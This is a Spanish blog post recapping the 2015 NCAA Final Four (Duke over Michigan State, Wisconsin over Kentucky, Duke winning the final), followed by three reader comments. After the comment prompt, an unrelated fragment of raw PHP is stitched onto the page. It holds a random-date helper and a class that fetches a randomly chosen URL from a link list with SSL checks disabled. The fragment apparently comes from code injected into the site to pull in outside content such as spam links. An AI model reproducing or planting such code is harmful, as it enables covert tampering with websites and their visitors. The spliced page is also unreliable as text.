March Madness 2015: Duke gana

08 de April de 2015 por Ruxixon

Mike Krzyzewski ya tiene su quinto título en su poder y lo ha conseguido con un equipo de rookies en lugar de con jugadores más veteranos y curtidos como en los trofeos anteriores. Los Wisconsin Badgers rozaron ela victoria con la punta de sus dedos pero acabaron cayendo en los últimos minutos cuando parecía que la experiencia jugaría a su favor. Con las marchas del “jugador del año” Frank Kaminsky y Sam Dekker es probable que pasen muchos años antes que los Badgers se vean en una parecida.

Pero repasemos los que dieron de sí los 3 partidos de la Final Four, uno de los mayores espectáculos del mundo.

Michigan St – Duke

Enero, Febrero… ¡Izzo! Los Spartans se habían enfundado el traje de “Cenicienta” de este año, y es que nadie contaba con ellos a estas alturas de campeonato, más que nada por la pobre temporada que estaban llevando a cabo. Pero ha sido llegar los partidos importantes y en esos momentos es cuando ha salido el 110% del equipo, por obra de un tal Tom Izzo, una leyenda de los banquillos a nivel universitario. Sin emabargo, su racha se detuvo en el duelo de acceso a la final universitaria ante Krzyzewski, que ha juntado en su Duke una pléyade de freshman de mucha calidad.

El conjunto de Izzo empezó a un ritmo muy fuerte, aprovechando las lagunas defensivas de Duke que permitieron tirar en solitario a los Spartans, de ahí ese 4/4 en triples durante los 5 primeros minutos. El tiempo muerto de la televisión llegó y cualquiera diría que fue Krzyzewski quien lo solicitó pues a la vuelta se pudo ver a una Duke mucha más agresiva en defensa, lo que llevó a la remontada cuando faltaban 9 minutos para el final de los primeros 20 minutos. Los Blue Devils no perderían ya la iniciativa en lo que quedaba de noche. La defensa sería clave tal como reconoció posteriormente a la prensa el entrenador. A partir de ella evitaron situaciones como las de partida, con Valentine tirando liberado desde las esquinas, generaron malos tiros en Michigan y tuvieron muchas más oportunidades en transición, en las que Duke anotaban con facilidad y cuando no, eran llevados a la línea de personal. Hasta de 37 intentos gozaron, 21 más que los Spartans. El resultado final despeja cualquier atisbo de partido igualado: Duke 81 – Michigan St 61. Los jugadores más conocidos de Michigan fueron los mejores. Denzel Valentine hizo un 22-11, Travis Trice 16 puntos y 5 asistencias y Branden Dawson 12 puntos con 7 rebotes. 50 puntos entre los 3, una buena medida del buen trabajo de Izzo llegando hasta aquí con una plantilla más floja de lo habitual. Por Duke, Jahlil Okafor volvió por sus fueros después de quedarse a las puertas del “Jugador del Año” que recayó en Kaminsky. Lo cierto es que en Michigan State no había ningún jugador que por condiciones físicas pudiera frenarlo, y eso también lo agradeció el pívot (18 puntos y 6 rebotes). Otro que mejoró respecto a pasadas noches fue Quinn Cook, con 17 puntos. Y por último destacar a Justise Winslow, que poco a poco va robando el corazón de muchos aficionados y a saber si de algún GM de la NBA. 19 puntos y 9 rebotes le coronaron como el MVP del partido. Lleva una media de 15.4 puntos y 9.4 rebotes en el torneo y cada vez más se habla de su intromisión entre los 4 favoritos del draft.

Kentucky – Wisconsin

Por segundo año consecutivo ambos equipos se citaban en este punto del campeonato y Wisconsin tenía ganas de enterrar esa imagen de Aaron Harrison dándo la victoria a los suyos de la temporada pasada. Por su parte los Wildcats acumulaban un inmaculado balance de 38-0 y llegaban a Indianápolis con la intención de tener la oportunidad de repetir la gesta que los Hoosiers consiguieran 40 años atrás: ganar el campeonato sin perder un partido en todo el año. Se presentaba pues un partido por todo lo alto y lo cierto es que no defraudó.

El partido arrancó con un intercambio de golpes con los gemelos Harrison llevaban la voz cantante por Kentucky, como viéndose obligados a retornar el protagonismo al apellido, mientras que por Wisconsin la aportación era más variada. El primer tirón en el marcador llegó a cargo de los Badgers mediada la primera parte, según fueron creciendo Sam Dekker y sobre todo Frank Kaminsky en el encuentro. De todas formas de nuevo los Harrison consiguieron equilibrar fuerzas y al descanso el resultado era de empate a 36.

Wisconsin volvió a apretar las tuercas con Kaminsky al mando, que aportó 7 puntos desde la reanudación del juego hasta que el marcador era 52-44 para el equipo dirigido por Bo Ryan. Tyler Ulis y Devin Booker aparecieron para Kentucky pero el protagonismo absoluto de los Wildcats fue para Karl-Anthony Towns, que en sus mejores minutos fue clave para, de nuevo, igualar el marcador e incluso poner por delante a su equipo, 56-60 a 6:37 para el final. Entonces llegó el duelo a una fase de desacierto donde el equipo que mejor controlara los nervios se llevaría el pase a la final. Y como hemos venido señalando en jornadas anteriores Wisconsin sabe jugar estos minutos. En esta ocasión un de nuevo genial Sam Dekker, con una sangre fría tremenda, anotó 6 puntos de manera casi consecutiva –una bandeja de Hayes por medio- para darle la vuelta al partido (64-60) aprovechando la sequía de Kentucky.

Aaron Harrison puso a su equipo a 1 punto tras forzar una penetración y llevarse el adicional por falta de Kaminsky (64-63 WIS), Ese tiro libre condujo a la procesión de faltas personales y correspondientes visitas a la línea de personal con el tiempo agotándose, más aun teniendo en cuenta las posesiones a 35 segundos que se juegan en la NCAA.  Towns fallaría en su segundo lanzamiento dejándole la victoria a Wisconsin en la palma de la mano, teniendo en cuenta su seguridad en estos momentos. Calipari intentó una versión de déjà vu-machada “diseñando” –por decir algo- una jugada para el triple –heroico- de Aaron Harrison pero esta vez las musas del basket quisieron darle la oportunidad al equipo que el año pasado lloró a estas alturas. Wisconsin ganaba 71 a 64 y era finalista tras 74 años de espera.

Kentucky dice adiós con el 38-1 en su balance, una única derrota pero de las que duelen. Los Harrison anotaron 25 puntos y Towns, el mejor jugador de Kentucky en la derrota, 16-9. Demasiado peso quiso dar a los gemelos Calipari olvidándose de su potencia interior. No obstante en el duelo en la pintura, Wisconsin superó ampliamente en el rebote a su rival (34 a 22). Realmente sorprendente. Por Wisconsin se apuntaron a la fiesta Nigel Hayes y Bronson Koenig 24 puntos y 9 rebotes, y los habituales, Dekker 16 puntos y Kaminsky 20 puntos y 11 capturas de los tableros.

Wisconsin – Duke

Wisconsin contra Duke, en los banquillos Bo Ryan cara a cara con Mike Krzyzewski y en la pista Kaminsky y Dekker contra Okafor, Winslow y Tyus Jones. Empieza el último baile. Empieza la final de la Madness.

71149 fueron testigos de un partido muy igualado, con multitud de cambios a la hora de liderar el marcador. Ambos conjuntos arrancaron la velada aprovechando cualquier oportunidad de jugar rápido para pillar desprevenida a la defensa rival. En ese toma y daca Duke cogió las riendas del partido abriendo una pequeña brecha de 4 puntos que conservó durante 3 minutos (del 11 al 14). Wisconsin no aparecía pero Kaminsky dio un paso al frente para arrebatar, literalmente, el balón de un blando Okafor, acción que acabaría en canasta de Jackson y el propio center de los Badgers sumó un 2+1 para enchufar a equipo y aficionados en la final. El partido fue llegando lentamente al 31-31 que lucirían los videomarcadores del Lucas Oil Stadium.

Aprovechando la inercia positiva que habían iniciado, Wisconsin fue creciendo en sensaciones en la segunda parte, hasta el punto de distanciarse 9 puntos (48-39) a falta de 13:23 para el final. Kaminsky seguía liderando a su equipo y formó alianza con Koenig (10 puntos) para cosechar dicha ventaja. Por su parte Dekker (12 puntos y 8 rebotes pero un 0-6 en triples), un jugador que siempre está a tope sobre la cancha, parecía esta vez superado por la importancia de lo que había en juego. En este momento crítico de partido apareció para sorpresa de todos Grayson Allen (16 puntos). Poco habituado a contar con minutos – de hecho es el tercer integrante de la plantilla que menos contaba para Krzyzewski esta temporada (una media de 9.2 minutos en 38 partidos) – con un desparpajo fuera de lo común, anotó 8 puntos de manera consecutiva en ausencia de Winslow (11 puntos con un pobre 3-9 en TC, y 9 rebotes) y Okafor, que por ese entonces calentaban banquillo debido a las personales, aunque tampoco estuvieron especialmente inspirados. El pequeño Tyus Jones, inmenso toda la noche con toda una demostración de carácter, tomó aire ante la irrupción de su compañero, y encadenó el show de Allen con el suyo propio, y con un fabuloso triple cayéndose culminó la vuelta en el marcador. Se faltaría a la verdad si no se abriera aquí un pequeño paréntesis para señalar además la excelente defensa que Duke puso en práctica y a través de la cual forjó la remontada, con un parcial 10-20 mediante el cual dieron Duke se colocaba 1 arriba (58-59). Aún quedaban 4 minutos para el final, un mundo para saber quién se llevaría el campeonato. Tuvo tiempo Okafor (10-3) de redimirse con dos acciones consecutivas que sumaron 4 puntos. Primero una acción en el poste en la que demostró su fuerza tras acabar anotando en reverso a pesar de una clara falta de Kaminsky –aunque fallaría el tiro libre- y posteriormente anotando una bandeja tras capturar el rebote ofensivo. Fueron sus acciones más destacadas en una noche que vuelve a dejar dudas sobre su rendimiento al más alto nivel y si se merece el pick 1 del próximo draft. Wisconsin se encontró 5 abajo a falta de 2 minutos y en medio de una laguna donde sólo Kaminsky (21 puntos, 12 rebotes) parecía tener las ideas claras. A falta de 1:51 llegó la polémica de la final –aunque Bo Ryan protestó varias jugadas y es cierto que se notó una ligera tendencia favorable a Duke desde el equipo arbitral- cuya resolución sepultaría las acciones de Wisconsin. En un rebote disputado entre Koenig y Winslow los árbitros señalaron bola para Duke. Aunque en directo la decisión pudo ser considerada correcta, los árbitros mantuvieron su criterio tras consultar la revisión oficial en la cual todo el mundo pudo ver como Winslow fue el último en tocar el balón. Esta controvertida decisión se agravó aún más cuando inmediatamente después Tyus Jones (MVP con 23 puntos y 5 asistencias) acabó por coronar su noche con un triple que mataba el partido. Duke sólo tuvo que llegar al final del partido para levantar los brazos (63-68). La era de Kaminsky en Wisconsin se cerraba sin saborear el mayor de los éxitos. Duke había ganado el campeonato.

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Muy buena narracion!

      Citar

  2. MagicJohnson32 dice:
    #2

    ¿Quién necesita ver el March Madness cuando puede leer una crónica como esta? 😉

    Enhorabuena y gracias, Ruxixon.

      Citar

  3. Ruxixón dice:
    #3

    ¡Muchas gracias!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>